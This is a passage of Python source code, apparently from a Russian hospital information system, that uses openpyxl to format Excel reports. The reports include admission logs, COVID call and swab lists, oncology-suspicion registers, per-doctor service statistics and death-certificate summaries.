ws1.cell(row=2, column=1).value = fin_obj.title
return ws1
def jot_total_titles(ws1, titles):
"""
Заговловки видов работ
:param ws1:
:param titles:
:return:
"""
cel_res = OrderedDict()
for i in range(len(titles)):
cell_row = 5 + i
ws1.cell(row=cell_row, column=1).value = titles[i]
cel_res[titles[i]] = cell_row
return ws1, cel_res
def job_total_data(ws1, titles, data):
for k, v in data.items():
for res, uet in v.items():
r = titles.get(res)
ws1.cell(row=r, column=k + 1).value = str(uet)
def passed_research_base(ws1, data_date):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'ЖУРНАЛ учета приема и отказов в госпитализации за ' + data_date + 'г.(мед.документация Ф№001/У утв. МИНЗДРАВОМ СССР 04.10.1980г. №1030)'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 115
columns = [
('№ п/п', 5),
('Время поступления', 8),
('Услуга (дата-время подтверждения)', 14),
('Направление', 11),
('Фамилия, имя, отчество больного', 20),
('Дата рождения', 10),
('Постоянное место жительства или адрес родственников, близких и N телефона', 23),
('Каким учреждением был направлен или доставлен', 15),
('Отделение, в которое помещен больной', 12),
('N карты (стационарного) больного', 10),
('Диагноз направившего учреждения', 7),
('Диагноз при поступлении', 7),
('№ ДДУ', 16),
('Полис', 21),
('Примечания', 10),
('Выписан, переведен в другой стационар, умер (вписать и указать дату и название стационара, куда переведен', 20),
('Отметка о сообщении родственникам или учреждению', 11),
('Если не был госпитализирован указать причину и принятые меры', 11),
('отказ в приеме первичный, повторный (вписать)', 11),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def passed_research_data(ws1, data):
r = 2
n = 0
empty = ' '
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
current_research_title = i[1]
current_polis_n = i[2] or empty
current_polis_who_give = i[3] or empty
current_napravlen = i[4]
current_datatime_confirm = i[5]
current_create_napr = i[6]
current_diagnoz = i[7] or empty
current_result = i[8] or empty
current_napr_time_at = i[19] or empty
current_num_card = i[10]
current_family = i[11] or empty
current_name = i[12] or empty
current_patronymic = i[13] or empty
current_birthday = i[14] or empty
current_main_address = i[15] if i[15] else ''
current_fact_address = i[16] if i[16] else empty
current_address = current_main_address if current_main_address else current_fact_address
current_work_place = i[17] or empty
current_kem_napravlen = i[18] or empty
r = r + 1
n = n + 1
ws1.cell(row=r, column=1).value = n
ws1.cell(row=r, column=2).value = current_napr_time_at
ws1.cell(row=r, column=3).value = f'{current_research_title},\n({current_datatime_confirm})'
ws1.cell(row=r, column=4).value = f'{current_napravlen},\n({current_create_napr})'
ws1.cell(row=r, column=5).value = current_family + ' ' + current_name + ' ' + current_patronymic
ws1.cell(row=r, column=6).value = current_birthday
ws1.cell(row=r, column=7).value = current_address
ws1.cell(row=r, column=8).value = current_kem_napravlen
ws1.cell(row=r, column=9).value = 'Приемное'
ws1.cell(row=r, column=10).value = current_num_card
ws1.cell(row=r, column=11).value = ' '
ws1.cell(row=r, column=12).value = current_diagnoz
ws1.cell(row=r, column=13).value = current_work_place
ws1.cell(row=r, column=14).value = current_polis_n + ', ' + current_polis_who_give
ws1.cell(row=r, column=15).value = ' '
ws1.cell(row=r, column=16).value = current_result
ws1.cell(row=r, column=17).value = ' '
ws1.cell(row=r, column=18).value = ' '
ws1.cell(row=r, column=19).value = ' '
for j in range(1, 20):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def covid_call_patient_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Обзвон'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_call_patient_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Дата следующего звонка"])
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def covid_swab_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Повторный мазок'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
('Адрес', 55),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_swab_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Сдача повторного мазка на COVID"])
ws1.cell(row=r, column=6).value = i["Адрес"]
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
r += 1
return ws1
def covid_bl_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Продолжение БЛ'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_bl_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Продолжение БЛ"])
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def onco_base(ws1, d_s, d_e):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=13)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=8)
ws1.cell(row=1, column=1).value = f'ЖУРНАЛ учета онкоподозрения c {d_s} по {d_e}'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
# ws1.row_dimensions[2].height = 85
columns = [('№ п/п', 5), ('ФИО пациента', 30), ('Дата рождения', 15), ('N карты', 15), ('Врач поставил', 30), ('Дата постановки', 20), ('Врач снял', 30), ('Дата снятия', 20)]
ws1.row_dimensions[2].height = 15
ws1.cell(row=2, column=1).value = ''
for idx, column in enumerate(columns, 1):
ws1.cell(row=3, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=3, column=idx).style = style_border
return ws1
def passed_onco_data(ws1, data):
r = 3
n = 0
empty = ' '
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=12)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
current_patient = i[0] or empty
current_birhday = i[1] or empty
current_num_card = i[2] or empty
current_doc_start = i[3] or empty
current_date_start = i[4] or empty
current_doc_end = i[5] or empty
current_date_end = i[6] or empty
r = r + 1
n = n + 1
ws1.cell(row=r, column=1).value = n
ws1.cell(row=r, column=2).value = current_patient
ws1.cell(row=r, column=3).value = current_birhday
ws1.cell(row=r, column=4).value = current_num_card
ws1.cell(row=r, column=5).value = current_doc_start
ws1.cell(row=r, column=6).value = current_date_start
ws1.cell(row=r, column=7).value = current_doc_end
ws1.cell(row=r, column=8).value = current_date_end
for j in range(1, 9):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def style_sheet():
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.border = border
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True)
style_border1 = NamedStyle(name="style_border1")
style_border1.border = border
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True)
style_o = NamedStyle(name="style_o")
style_o.font = Font(bold=True, size=11)
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
return (style_border, style_o, style_border1, style_border_res)
def statistics_tickets_base(ws1, i_obj, type_fin, d1, d2, style_border, style_o):
"""
Назначить ширину колонок. Вход worksheet выход worksheen с размерами
Заголовки данных
"""
columns = [
('Дата', 13),
('Кол-во', 7),
('Услуга', 15),
('Соисполнитель', 9),
('ФИО пациента,\n№ направления', 31),
('Дата рождения', 13),
('№ карты', 12),
('Данные полиса', 27),
('Код услуги', 16),
('Услуга \n (ует/мин)', 12),
('Время \n подтверждения', 18),
('Онкоподозрение', 13),
('Первичный прием', 12),
('Цель \n посещения\n(код)е', 13),
('Диагноз \n МКБ', 13),
('Впервые', 13),
('Результат \n обращения \n(код)', 13),
('Исход(код)', 13),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=7, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=7, column=idx).style = style_border
# Закголовки столбцов
ws1.cell(row=1, column=1).value = 'Сотрудник'
ws1.cell(row=1, column=1).style = style_o
ws1.cell(row=1, column=2).value = i_obj.fio
ws1.cell(row=2, column=1).value = 'Должность'
ws1.cell(row=2, column=1).style = style_o
ws1.cell(row=2, column=2).value = i_obj.specialities.title if i_obj.specialities else ""
ws1.cell(row=4, column=1).value = 'Период:'
ws1.cell(row=4, column=1).style = style_o
ws1.cell(row=5, column=1).value = d1
ws1.cell(row=5, column=2).value = 'по'
ws1.cell(row=5, column=3).value = d2
ws1.cell(row=1, column=5).value = 'Код врача'
ws1.cell(row=1, column=5).style = style_o
ws1.cell(row=1, column=6).value = i_obj.personal_code
ws1.cell(row=3, column=5).value = 'Источник'
ws1.cell(row=3, column=5).style = style_o
fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
ws1.cell(row=3, column=6).value = fin_obj.title
return ws1
def statistics_tickets_data(ws1, issl_obj, i_obj, style_border1):
# i_obj - обеъект доктор
my_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='a9d094', end_color='a9d094')
total_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='ffcc66', end_color='ffcc66')
r = 7
r1 = r + 1
total_sum = []
# one_days = timedelta(1)
current_date = ''
for issled in issl_obj:
# Порядок колонок в issled:
# title, code, is_first_reception, polis_n, polis_who_give, \
# first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \
# co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \
# time_confirm, maybe_onco, purpose, diagnos, iss_result, \
# outcome, card_number, client_family, client_name, client_patronymic, \
# birthday
empty = ' '
# current_datetime_confirm = issled[13]
current_date = issled[14]
# current_count = 1
current_research_title = issled[0]
f = issled[22] or empty
n = issled[23] or empty
p = issled[24] or empty
current_napr = str(issled[6])
current_patient_napr = f'{f} {n} {p}\n{current_napr}'
current_born = issled[25]
current_card = issled[21]
polis_n = issled[3] or ''
polis_who = issled[4] or ''
current_polis = f'{polis_n};\n{polis_who}'
current_code_reserch = issled[1]
current_doc_conf = issled[7]
current_def_uet = issled[8] or 0
current_co_exec1 = issled[9]
current_uet1 = issled[10] or 0
current_co_exec2 = issled[11]
current_uet2 = issled[12] or 0
current_time_confirm = issled[15]
current_isfirst = issled[2]
current_onko = issled[16]
current_purpose = issled[17]
current_diagnos = issled[18]
current_firsttime = issled[5]
current_result = issled[19]
current_octome = issled[20]
# current_price = ''
if r != 7 and r != 8:
befor_date = ws1.cell(row=r, column=1).value
if current_date != befor_date and not (ws1.cell(row=r, column=1).value).istitle():
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого за ' + befor_date[:2]
ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
total_sum.append(r)
ws1.row_dimensions.group(r1, r - 1, hidden=True)
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = my_fill
r1 = r + 1
r = r + 1
ws1.cell(row=r, column=1).value = current_date
ws1.cell(row=r, column=2).value = 1
ws1.cell(row=r, column=3).value = current_research_title
sum_uet = 0
co_exec = ''
if (current_doc_conf == i_obj.pk) and (current_co_exec1 == i_obj.pk):
sum_uet = sum_uet + current_def_uet
co_exec = co_exec + 'ОСН'
if (current_doc_conf == i_obj.pk) and (current_co_exec1 != i_obj.pk):
sum_uet = sum_uet + current_def_uet
co_exec = co_exec + 'ОСН'
if (current_doc_conf != i_obj.pk) and (current_co_exec1 == i_obj.pk):
sum_uet = sum_uet + current_uet1
co_exec = co_exec + 'СО-1'
if current_co_exec2 == i_obj.pk:
sum_uet = sum_uet + current_uet2
co_exec = co_exec + ', СО-2'
ws1.cell(row=r, column=4).value = co_exec
ws1.cell(row=r, column=5).value = current_patient_napr
ws1.cell(row=r, column=6).value = current_born
ws1.cell(row=r, column=7).value = current_card
ws1.cell(row=r, column=8).value = current_polis
ws1.cell(row=r, column=9).value = current_code_reserch
ws1.cell(row=r, column=10).value = str(sum_uet)
ws1.cell(row=r, column=11).value = current_time_confirm
ws1.cell(row=r, column=12).value = current_onko
ws1.cell(row=r, column=13).value = current_isfirst
ws1.cell(row=r, column=14).value = current_purpose
ws1.cell(row=r, column=15).value = current_diagnos
ws1.cell(row=r, column=16).value = current_firsttime
ws1.cell(row=r, column=17).value = current_result
ws1.cell(row=r, column=18).value = current_octome
ws1.cell(row=r, column=19).value = ''
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.style = style_border1
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого за ' + current_date[:2]
ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
ws1.row_dimensions.group(r1, r - 1, hidden=True)
total_sum.append(r)
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = my_fill
t_s = '=SUM('
t_s_uet = '=SUM('
for ts in total_sum:
t_uet = ts
t_s = t_s + f'(B{ts})' + ','
t_s_uet = t_s_uet + f'(J{t_uet})' + ','
t_s = t_s + ')'
t_s_uet = t_s_uet + ')'
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого Всего'
ws1.cell(row=r, column=2).value = t_s
ws1.cell(row=r, column=10).value = t_s_uet
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = total_fill
return ws1
def inderect_job_base(ws1, doc_obj, d1, d2):
pink_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='FCD5B4', end_color='FCD5B4')
rows = ws1[f'A{1}:V{1}']
for row in rows:
for cell in row:
cell.fill = pink_fill
ws1.column_dimensions[get_column_letter(1)].width = 15
ws1.column_dimensions[get_column_letter(2)].width = 30
ws1.column_dimensions[get_column_letter(3)].width = 15
ws1.cell(row=1, column=1).value = "Косвенные услуги"
ws1.cell(row=2, column=1).value = "Сотрудник"
ws1.cell(row=2, column=2).value = doc_obj.fio
ws1.cell(row=3, column=1).value = f'c {d1}'
ws1.cell(row=3, column=2).value = f'по {d2}'
return ws1
def inderect_job_data(ws1, indirect_job):
r = 4
for k, v in indirect_job.items():
for k_job, v_job in v.items():
r = r + 1
ws1.cell(row=r, column=1).value = k
ws1.cell(row=r, column=2).value = k_job
ws1.cell(row=r, column=3).value = v_job
return ws1
def statistic_research_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Исполнитель', 26),
('Направление, за дату', 15),
('Дата подтверждения', 16.5),
('Время подтверждения', 16.5),
('Источник', 10),
('Цена', 10),
('Кол-во', 7),
('Скидка', 7.5),
('Сумма', 14),
('Физлицо', 26),
('Дата рождения', 12),
('Возраст', 8),
('Карта', 15),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_data(ws1, researches):
"""
res - результат выборки SQL
порядок возврата:
napr, date_confirm, time_confirm, create_date_napr, create_time_napr,
doc_fio, coast, discount, how_many, ((coast + (coast/100 * discount)) * how_many)::NUMERIC(10,2) AS sum_money,
ist_f, time_confirmation, num_card, ind_family, ind_name,
patronymic, birthday, date_born, to_char(EXTRACT(YEAR from age(time_confirmation, date_born)), '999') as ind_age
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for res in researches:
r += 1
current_doc = res[5]
current_napr = res[0]
current_napr_atcreate = res[3]
current_date_confirm = res[1]
current_time_confirm = res[2]
current_ist_f = res[10]
current_coast = res[6]
current_how_many = res[8]
current_discount = res[7]
current_price_total = res[9]
current_ind_fio = f'{res[13]} {res[14]} {res[15]}'
current_born = res[16]
current_age = res[18]
current_num_card = res[12]
ws1.cell(row=r, column=1).value = current_doc
ws1.cell(row=r, column=2).value = f'{current_napr}, {current_napr_atcreate}'
ws1.cell(row=r, column=3).value = current_date_confirm
ws1.cell(row=r, column=4).value = current_time_confirm
ws1.cell(row=r, column=5).value = current_ist_f
ws1.cell(row=r, column=6).value = current_coast
ws1.cell(row=r, column=7).value = current_how_many
ws1.cell(row=r, column=8).value = current_discount
ws1.cell(row=r, column=9).value = current_price_total
ws1.cell(row=r, column=10).value = current_ind_fio
ws1.cell(row=r, column=11).value = current_born
ws1.cell(row=r, column=12).value = current_age
ws1.cell(row=r, column=13).value = current_num_card
ws1.cell(row=r, column=14).value = res[19]
rows = ws1[f'A{r}:M{r}']
for row in rows:
for cell in row:
cell.style = style_border_res
return ws1
def statistic_research_death_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Серия', 13),
('Номер', 15),
('Вид МСС', 17),
('Медицинская организация выдавшая свидететельство', 18),
('Прикрепление пациента', 18),
('Участок', 10),
('Дата смерти', 11),
('Дата рождения', 11),
('ФИО умершего пациента', 25),
('Пол (м/ж)', 6),
('Возраст на дату смерти', 6),
('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
('а) период', 10),
('а) Код по МКБ- 10', 9),
('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
('б) период', 10),
('б) Код по МКБ- 10', 9),
('в) перво-начальная причина смерти', 17),
('в) период', 10),
('в) Код по МКБ- 10', 9),
('г) внешняя причина при травмах и отравлениях', 17),
('г) период', 10),
('г) Код по МКБ- 10', 9),
('II.Прочие важные состояния способствовавшие смерти', 15),
('класс заболевания первоначальной причины смерти', 15),
('Место смерти (1/0)', 15),
('Название стационара', 15),
('ДТП (1/0)', 12),
('Материнская смертность (1/0)', 15),
('ФИО выдавшего свидетельства', 20),
('Тип места смерти', 25),
('ОКПО', 16),
('ОКАТО', 16),
('Экспертиза', 35),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_reserved_research_death_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border_rz")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Медицинская организация', 40),
('Номер в резерве', 20),
('Дата создания', 22),
('<NAME>', 35),
('Направление', 20),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_death_base_card(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border_ca")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Серия', 13),
('Номер', 15),
('Вид МСС', 17),
('Медицинская организация выдавшая свидететельство', 18),
('Прикрепление пациента', 18),
('Участок', 10),
('Дата смерти', 11),
('Дата рождения', 11),
('ФИО умершего пациента', 25),
('Пол (м/ж)', 6),
('Возраст на дату смерти', 6),
('а) болезнь или состояние, непосредст-венно приведшее к смерти', 17),
('а) период', 10),
('а) Код по МКБ- 10', 9),
('б) патологи-ческое состояние, которое привело к болезни или состоянию, непосредст-венно приведшее к смерти', 17),
('б) период', 10),
('б) Код по МКБ- 10', 9),
('в) перво-начальная причина смерти', 17),
('в) период', 10),
('в) Код по МКБ- 10', 9),
('г) внешняя причина при травмах и отравлениях', 17),
('г) период', 10),
('г) Код по МКБ- 10', 9),
('II.Прочие важные состояния способствовавшие смерти', 15),
('класс заболевания первоначальной причины смерти', 15),
('Место смерти (1/0)', 15),
('Название стационара', 15),
('ДТП (1/0)', 12),
('Материнская смертность (1/0)', 15),
('ФИО выдавшего свидетельства', 20),
('Тип места смерти', 25),
('ОКПО', 16),
('ОКАТО', 16),
('Экспертиза', 35),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_death_data(ws1, researches, expertise_final_data):
"""
:return:
"""
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
r = 4
for i in researches:
if not i:
return ws1
try:
type_doc_death = i["Вид медицинского свидетельства о смерти"]["title"]
except:
type_doc_death = i.get("Вид медицинского свидетельства о смерти", "")
if not type_doc_death:
continue
r += 1
ws1.cell(row=r, column=1).value = i["Серия"]
ws1.cell(row=r, column=2).value = i["Номер"]
ws1.cell(row=r, column=3).value = type_doc_death
ws1.cell(row=r, column=4).value = i["hosp_title"]
mo_attachment, mo_district = "-", "-"
if i.get("Прикрепление", None):
attachment_data = i.get("Прикрепление").split("—")
mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
mo_district = attachment_data[1]
ws1.cell(row=r, column=5).value = mo_attachment
ws1.cell(row=r, column=6).value = mo_district
ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
ws1.cell(row=r, column=8).value = i["Дата рождения"]
ws1.cell(row=r, column=9).value = i["fio_patient"]
ws1.cell(row=r, column=10).value = i["sex"]
d1 = du_parse(i["Дата смерти"])
try:
d2 = du_parse(i["Дата рождения"])
delta = relativedelta(d1, d2)
ws1.cell(row=r, column=11).value = delta.years
except:
ws1.cell(row=r, column=11).value = "-"
# а)
diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=13).value = diag_data[0]
ws1.cell(row=r, column=14).value = diag_data[1]["code"]
# б)
diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=16).value = diag_data[0]
ws1.cell(row=r, column=17).value = diag_data[1]["code"]
# в)
diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=19).value = diag_data[0]
ws1.cell(row=r, column=20).value = diag_data[1]["code"]
# г)
diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
ws1.cell(row=r, column=22).value = diag_data[0]
ws1.cell(row=r, column=23).value = diag_data[1]["code"]
diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
ws1.cell(row=r, column=25).value = ""
place_death_details = ""
try:
place_death_details = json.loads(i["Место смерти"])
is_dict = True
except:
is_dict = False
if not is_dict:
try:
place_death_details = i["Место смерти"].get("address", None)
is_dict = True
except:
is_dict = False
if not is_dict:
place_death_details = "-"
ws1.cell(row=r, column=26).value = place_death_details
# Название стационара
ws1.cell(row=r, column=27).value = i.get("МО", "")
# ДТП
ws1.cell(row=r, column=28).value = i["ДТП"]
ws1.cell(row=r, column=29).value = i["Беременность"]
if i.get("Заполнил", None):
who_write = i.get("Заполнил")
else:
who_write = ""
ws1.cell(row=r, column=30).value = who_write
ws1.cell(row=r, column=31).value = ""
ws1.cell(row=r, column=32).value = ""
ws1.cell(row=r, column=33).value = ""
experise = ""
if expertise_final_data.get(i.get('issledovaniye_id', ""), ""):
